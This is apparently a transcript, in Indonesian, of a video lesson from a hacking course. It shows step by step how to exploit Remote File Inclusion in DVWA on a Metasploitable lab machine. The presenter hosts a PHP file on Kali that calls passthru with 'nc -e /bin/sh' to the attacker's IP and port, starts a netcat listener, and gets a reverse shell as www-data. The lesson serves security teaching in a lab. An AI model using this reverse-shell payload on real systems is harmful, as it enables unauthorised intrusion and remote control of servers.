Pada video kali ini kita akan membahas tentang Remote File Inclusion Vulnerabilities. Namun sebelum itu, pastikan burp suite-nya kita off-kan. Kita belum menggunakan burp suite di sini, jadi pastikan intercept-nya off, jadi agar tidak mengganggu traffic kita. Selanjutnya, di DVWA Security, pastikan level security-nya kita menggunakan low. Oke, kita masuk ke file inclusion. Pada video sebelumnya kita sudah membahas local file inclusion vulnerabilities. Artinya di sini kita memasukkan file lokal yang ada di Metasploitable. Jadi sebagai contoh tadi kita memasukkan URL seperti ini. Artinya dari URL ini kita mengakses file proc self environ yang ada di Metasploitable. Nah, selanjutnya pada video kali ini kita akan membahas Remote File Inclusion Vulnerabilities. Artinya kita tidak lagi mengakses local file seperti ini. Jadi nanti kita akan mengakses file yang ada di sistem lain. Dalam hal ini nanti yang akan kita akses adalah file yang ada di Kali Linux. Jadi nanti formatnya kita akan menggunakan HTTP, kemudian IP dari Kali Linux, kemudian nama filenya apa, seperti itu. Nah, jika kita lihat seperti ini, artinya di Kali Linux kita harus menjalankan web server. By default, Kali Linux sudah ada Apache 2. Namun biasanya belum start secara otomatis. Jadi kita buka Kali Linux terminal terlebih dahulu. Di sini kita restart service Apache-nya. Caranya adalah etc init.d kemudian Apache 2 restart. Oke, sudah selesai. Kita kembali ke browser. Kita coba akses localhost. Oke, di sini perhatikan bahwa di Kali Linux kita sudah punya web server Apache 2. Nah, selanjutnya tugas kita adalah membuat file di dalam web server Kali Linux ini, di mana file tersebut nantinya akan kita manfaatkan di dalam proses hacking menggunakan Remote File Inclusion Vulnerabilities di sini. Oke, langsung saja kita buka terminal di Kali Linux. Kemudian untuk membuat file di web server, maka kita harus menaruh di var www.html kemudian nama filenya. Sebagai contoh, misal saya ingin membuat file dengan nama reforce.txt. Di sini kita bisa menuliskan skrip PHP menggunakan pass-through. Ingat pass-through yang sudah kita manfaatkan ketika membahas tentang local file inclusion vulnerabilities. Jadi skripnya akan seperti ini. Kita menggunakan pass-through. Kemudian nc min e bin sh. Kemudian IP dari Kali Linux. Kemudian port yang akan di-open di Kali Linux. Misal portnya 1234. Nah, artinya nanti ketika kita mengeksekusi komen ini, maka Metasploitable akan mengeksekusi komen nc-e bin sh 10.0215.1234. Jadi Metasploitable akan connect ke IP Kali Linux port 1234. Kita Ctrl X, Y, Enter. Kemudian kita coba di browser localhost/reforce.txt. Perhatikan kita bisa mengakses file ini. Nah, selanjutnya tugas kita adalah kita harus listen di port 1234 di Kali Linux-nya. Jadi nc min vv listen, kemudian min p 1234. Oke, Kali Linux kita sudah listen di port 1234. Selanjutnya, di dalam DVWA, kita coba lakukan hacking pada Remote File Inclusion Vulnerabilities. Jadi di sini page-nya kita arahkan ke http 10.0215/reforce.txt. Jadi 10.0215 ini adalah IP dari Kali Linux. Jika pada tab sebelah kita mengakses localhost, ini artinya Kali Linux itu sendiri. Atau bisa juga localhost-nya kita ganti menjadi IP Kali Linux, yaitu 10.0215.
maka hasilnya akan sama seperti ini. Jadi di sini jika kita lihat, maka kita mengakses file reforce.txt yang ada di dalam Kali Linux. Seperti halnya yang kita lakukan di sini. Oke, langsung saja kita enter. Dia akan loading. Jika kita lihat di terminal, perhatikan di sini bahwa kita sudah connect ke Metasploitable. Jika kita coba hostname Metasploitable, kita coba pwd, kita ada di folder tersebut. Jika kita ls, ada beberapa file. Jika saya id, maka kelihatan bahwa saya login sebagai user www.data. Oke, dengan sangat mudah kita sudah bisa melakukan hacking pada remote file inclusion vulnerabilities. Pada video selanjutnya kita akan coba meningkatkan tingkat security-nya menjadi medium. Sampai jumpa di video berikutnya.